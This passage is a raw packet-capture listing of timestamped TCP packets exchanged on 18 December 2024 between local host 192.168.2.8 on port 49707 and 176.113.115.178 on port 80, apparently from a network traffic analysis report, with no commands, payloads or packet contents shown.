                                                  Dec 18, 2024 14:07:39.257549047 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.257601976 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.258215904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.258301973 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.258346081 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.259088993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.259133101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.259881020 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.259929895 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.259942055 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.260832071 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.260840893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.260915995 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.260952950 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.261634111 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.261650085 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.261708021 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.262437105 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.262629986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.262686968 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.263154984 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.315824986 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.337857008 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.337872028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.337928057 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.338336945 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.338478088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.338530064 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.339179039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.339210033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.339963913 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.340127945 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.340147972 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.340188980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.340821028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.340836048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.340886116 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.341447115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.341598988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.341804981 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.342369080 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.342427015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.342473984 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.343209982 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.343225002 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.343283892 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.343993902 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.344037056 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.344084024 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.344851971 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.344969988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.345011950 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.345664024 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.345678091 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.345721006 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.346420050 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.346565962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.346615076 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.347246885 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.347515106 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.348129034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.348177910 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.423192024 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.423207045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.423257113 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.423377991 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.423551083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.423592091 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.424259901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.424272060 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.424312115 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.424834013 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.424982071 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.425025940 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.426095963 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.426107883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.426163912 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.427050114 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.427062035 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.427100897 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.427917957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.427932024 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.427997112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.428191900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.428204060 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.428246975 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.429344893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.429347992 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.429532051 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.429558039 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.429620028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.429665089 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.430248022 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.430562973 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.431188107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.431200981 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.431236982 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.431255102 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.432440996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.432454109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.432518005 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.433119059 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.433132887 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.433177948 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.433856010 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.433867931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.433914900 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.434555054 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.434567928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.434612989 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.435389042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.435686111 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.435751915 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.436141968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.436585903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.436918020 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.436964989 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.437032938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.437997103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.438010931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.438043118 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.438057899 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.438774109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.438786983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.438826084 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.439351082 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.439584017 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.439749956 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.440325975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.440339088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.440385103 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.441060066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.441597939 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.441637039 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.441956997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.441967964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.442194939 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.442608118 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.442776918 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.442821980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.443603992 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.443670034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.444185972 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.444267035 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.444639921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.444688082 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.445127964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.445233107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.445278883 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.446387053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.446402073 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.446449041 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.446955919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.446969032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.447032928 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.447690010 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.447701931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.447738886 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.448422909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.448577881 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.449140072 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.449192047 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.449398994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.449465990 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.450154066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.450166941 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.450217009 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.451003075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.451023102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.451071978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.451730967 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.451792955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.452590942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.452605009 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.452650070 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.452692986 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.453380108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.453392982 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.453443050 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.454586029 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.454601049 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.454642057 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.455374956 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.503300905 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.530448914 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.530467033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.530478954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.530492067 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.530601025 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.531941891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.531955004 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.532002926 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.532005072 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.532598019 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.533637047 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.533649921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.533663034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.533694029 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.534944057 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.534955978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.534967899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.535005093 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.535028934 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.535674095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.535686016 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.535732031 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.536886930 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.536900043 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.536911964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.536943913 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.538459063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.538470984 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.538480997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.538512945 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.538537979 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.538548946 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.539417028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.539437056 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.539463997 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.541425943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.541439056 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.541482925 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.615703106 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.615720034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.615844011 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.616041899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.616597891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.616641998 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.617453098 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.617466927 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.617501020 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.618272066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.618284941 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.618295908 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.618320942 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.618956089 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.619002104 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.619044065 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.619821072 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.619832039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.619870901 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.620659113 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.620671034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.620702028 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.621536016 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.621548891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.621596098 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.622442961 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.622454882 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.622489929 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.623351097 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.623399019 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.623492002 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.624783993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.624830961 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.625582933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.626322985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.626333952 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.626373053 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.626837969 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.626849890 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.626883984 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.627279043 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.627327919 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.627341986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.627998114 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.628036976 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.628036976 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.628619909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.628633022 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.628667116 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.629015923 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.629028082 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.629168034 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.629504919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.629545927 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.630067110 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.630769014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.630780935 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.630815029 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.631108999 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.631159067 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.631345034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.632443905 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.632455111 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.632491112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.632870913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.632891893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.633069992 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.634187937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.634197950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.634237051 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.634565115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.634577036 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.634613037 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.635373116 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.635416031 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.635948896 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.636526108 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.636537075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.636570930 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.637279987 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.637294054 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.637326956 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.637762070 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.637804031 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.637811899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.638657093 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.638672113 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.638716936 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.639377117 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.639421940 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.639590025 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.640383005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.640402079 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.640429020 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.641016960 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.641061068 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.641119003 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.642069101 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.642081022 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.642118931 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.642785072 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.642805099 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.642827034 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.643711090 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.643728018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.643759966 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.644517899 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.644571066 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.645338058 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.645371914 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.645409107 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.645544052 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.646085978 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.646126032 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:39.646570921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.647015095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.647027016 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:39.647061110 CET4970780192.168.2.8176.113.115.178
